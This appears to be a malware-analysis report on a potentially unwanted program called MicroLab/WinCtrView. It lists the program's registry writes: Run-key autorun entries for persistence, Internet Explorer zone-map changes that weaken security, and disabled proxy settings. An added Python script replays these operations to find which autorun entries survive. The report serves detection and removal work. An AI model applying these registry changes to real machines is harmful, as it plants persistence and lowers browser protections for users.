"(Default)" = "InetCtls.Inet"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C EA E8 E2 BE FA DA B2 7C 22 7A C3 70 CD 12 4F"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\MicroLab]
"Version" = "1208"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control URL Property Page Object"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
"(Default)" = "%System%\MSINET.OCX, 1"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the PUP adds the following reference to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroLabCon" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe -yTJAOYH"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the PUP adds the following reference to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroLabProc" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe -yTJAOYH"

The PUP deletes the following registry key(s):

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Programmable]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Control]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories]

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

The process %original file name%.exe:452 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 10 54 4D AA E0 DF 4E 06 C7 C6 83 F3 63 24 89"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The PUP sets the Internet Explorer Intranet zone option "Include all local (intranet) sites not listed in other zones" (dotless host names):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP sets the Intranet zone option "Include all network paths (UNCs)":

"UNCAsIntranet" = "1"

The PUP sets the Intranet zone option "Include all sites that bypass the proxy server":

"ProxyBypass" = "1"

The process WinCtrCon.exe:1684 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\WinCtrView]
"Commit" = "N"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\WinCtrView]
"Upmom" = "Y"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\WinCtrView]
"firstTime" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\WinCtrView]
"Version" = "1681"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 2B E6 1E 08 B0 39 CE 4B 3C 9A 7C CB 67 D2 F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\WinCtrView]
"MomDate" = "12/3/2014"

To run each time Windows starts, the PUP adds the following values to the registry autorun keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -HcSJXhQQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -HcSJXhQQ"

The PUP sets the Internet Explorer Intranet zone option "Include all network paths (UNCs)":

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The PUP sets the Intranet zone option "Include all sites that bypass the proxy server":

"ProxyBypass" = "1"

Proxy use is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP sets the Intranet zone option "Include all local (intranet) sites not listed in other zones" (dotless host names):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

"AutoConfigURL"
"ProxyOverride"

The PUP deletes the following autorun values. Note that the names do not match the "MicroLabCon" and "MicroLabProc" values set earlier, so that persistence is not removed by these deletions:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProProc"

The process WinCtrProc.exe:600 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCU\Software\WinCtrView]
"USER_NO" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\WinCtrView]
"Commit" = "Y"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\WinCtrView]
"ver" = "sup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\WinCtrView]
"firstTime" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\WinCtrView]
"Actdate" = "12/3/2014"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 59 E9 7D 88 F8 2C 06 33 0F 1B 88 A5 35 58 E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To run each time Windows starts, the PUP adds the following value to the registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -aukbpz"

The PUP sets the Internet Explorer Intranet zone option "Include all network paths (UNCs)":

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The PUP sets the Intranet zone option "Include all sites that bypass the proxy server":

"ProxyBypass" = "1"

Proxy use is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP sets the Intranet zone option "Include all local (intranet) sites not listed in other zones" (dotless host names):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run each time Windows starts, the PUP adds the following value to the registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -aukbpz"

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

"AutoConfigURL"

The PUP deletes the following autorun values from both hives. As above, the names differ from the "MicroLabCon" and "MicroLabProc" values that were actually set, so that persistence survives:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

"MicroProProc"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

"MicroProProc"

The process mscorsvw.exe:172 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process irsetup.exe:956 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKCU\Software\MicroLab]
"Owner" = "admin"
"PDR" = "asdfaeiqwerh"
"USER_NO" = "3030"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\MicroLab]
"S_NO" = "3030"
"CURDIR" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"InstallLocation" = "%Documents and Settings%\%current user%\Application Data\MicroLab\SearchEngin\LanguageConvert"

[HKCU\Software\MicroLab]
"Upmom" = "Y"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\MicroLab]
"Version" = "0000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"Publisher" = "MicroNames"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\MicroLab]
"Commit" = "Y"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"Contact" = "MicroNames Support Department"

[HKCU\Software\MicroLab]
"SUBNAME" = "MAIN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe /U:%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.xml"
"URLInfoAbout" = "http://www.hebogo.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 90 25 FF D9 64 64 77 86 DC 3E 88 7F C2 2E 26"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"HelpLink" = "http://www.hebogo.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\MicroLab]
"ver" = "sup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe"
"DisplayName" = "MicroNames Multi Language Convert Service"
"DisplayVersion" = "3.0"

To run each time Windows starts, the PUP adds the following values to the registry autorun keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroLabCon" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroLabProc" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

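The registry operations above are spread over several processes and the set and delete names do not line up, so the net effect is easier to see by replaying them. The following is an added example, not part of the Lavasoft report: it transcribes the autorun, ZoneMap and proxy operations listed above (keeping the report's own %...% placeholders, later processes' repeated proxy deletions omitted), applies them in the order the report lists them (an assumption; the name-mismatch result does not depend on order), and reports which Run values survive and which IE settings are left behind.

```python
"""Replay the registry set/delete operations from the report above and show
what persistence and browser-policy changes actually remain.

Added example, not code from the report. OPS is transcribed from the report;
listing order is assumed to be execution order."""
from typing import Dict, List, Optional, Tuple

RUN_HKCU = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_HKLM = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
INET = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
ZONEMAP = INET + r"\ZoneMap"
APPDATA = r"%Documents and Settings%\%current user%\Application Data"
MICROLAB = APPDATA + r"\MicroLab\MyEngin\Common"
WINCTR = APPDATA + r"\WinCtrView\Engin\ProVersion"

# (action, key, value name, data), in the order the report lists them
OPS: List[Tuple[str, str, str, Optional[str]]] = [
    ("set", RUN_HKCU, "MicroLabCon", MICROLAB + r"\MicroProCon.exe -yTJAOYH"),
    ("set", ZONEMAP, "UNCAsIntranet", "1"),
    ("set", INET, "ProxyEnable", "0"),
    ("set", ZONEMAP, "IntranetName", "1"),
    ("set", ZONEMAP, "ProxyBypass", "1"),
    ("set", RUN_HKLM, "MicroLabProc", MICROLAB + r"\MicroProProc.exe -yTJAOYH"),
    ("delete", INET, "AutoConfigURL", None),
    ("delete", INET, "ProxyServer", None),
    ("delete", INET, "ProxyOverride", None),
    # WinCtrCon.exe:1684
    ("set", RUN_HKCU, "WinCtrCon", WINCTR + r"\WinCtrCon.exe -HcSJXhQQ"),
    ("set", RUN_HKLM, "WinCtrProc", WINCTR + r"\WinCtrProc.exe -HcSJXhQQ"),
    ("delete", RUN_HKCU, "MicroProCon", None),
    ("delete", RUN_HKLM, "MicroProProc", None),
    # WinCtrProc.exe:600
    ("set", RUN_HKLM, "WinCtrProc", WINCTR + r"\WinCtrProc.exe -aukbpz"),
    ("set", RUN_HKCU, "WinCtrCon", WINCTR + r"\WinCtrCon.exe -aukbpz"),
    ("delete", RUN_HKCU, "MicroProCon", None),
    ("delete", RUN_HKCU, "MicroProProc", None),
    ("delete", RUN_HKLM, "MicroProCon", None),
    ("delete", RUN_HKLM, "MicroProProc", None),
    # irsetup.exe:956
    ("set", RUN_HKCU, "MicroLabCon", r"%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"),
    ("set", RUN_HKLM, "MicroLabProc", r"%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"),
]

# What each value corresponds to in the Internet Options dialog
IE_MEANING = {
    (ZONEMAP, "IntranetName"): "Intranet zone: include all local (intranet) sites not listed in other zones",
    (ZONEMAP, "UNCAsIntranet"): "Intranet zone: include all network paths (UNCs)",
    (ZONEMAP, "ProxyBypass"): "Intranet zone: include all sites that bypass the proxy server",
    (INET, "ProxyEnable"): "Use a proxy server for LAN connections (0 = off)",
}


def replay(ops):
    """Apply sets and deletes in order. Returns the final state and the
    deletes that targeted a value not present at that moment (no-ops)."""
    state: Dict[Tuple[str, str], str] = {}
    noops: List[Tuple[str, str]] = []
    for action, key, name, data in ops:
        if action == "set":
            state[(key, name)] = data
        elif action == "delete":
            if state.pop((key, name), None) is None:
                noops.append((key, name))
        else:
            raise ValueError(action)
    return state, noops


def surviving_run_values(state):
    """Run-key entries still present after every delete, keyed by (hive, name)."""
    return {(k.split("\\", 1)[0], n): v for (k, n), v in state.items() if k.endswith("\\Run")}


def run_delete_noops(noops):
    """Autorun deletions that hit nothing, as (hive, name)."""
    return [(k.split("\\", 1)[0], n) for k, n in noops if k.endswith("\\Run")]


def ie_findings(state):
    """Zone-map and proxy values the sample leaves behind, with their UI meaning."""
    return [(name, state[(key, name)], meaning)
            for (key, name), meaning in IE_MEANING.items() if (key, name) in state]


if __name__ == "__main__":
    final, missed = replay(OPS)
    for (hive, name), cmd in sorted(surviving_run_values(final).items()):
        print(f"persists      {hive}\\...\\Run  {name} = {cmd}")
    for hive, name in run_delete_noops(missed):
        print(f"no-op delete  {hive}\\...\\Run  {name} (never set under that name)")
    for name, value, meaning in ie_findings(final):
        print(f"IE setting    {name} = {value}  ({meaning})")
```

Running it lists four surviving autorun values (MicroLabCon, MicroLabProc, WinCtrCon, WinCtrProc) and six autorun deletions that removed nothing, which is the check to make before trusting the report's "disables automatic startup" wording during removal.
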
Dropped PE files

MD5 File path
835a0b2dd393dbf486d6e84aa7e41f95 c:\Documents and Settings\"%CurrentUserName%"\Application Data\GuardSupport\GuardConvert.exe
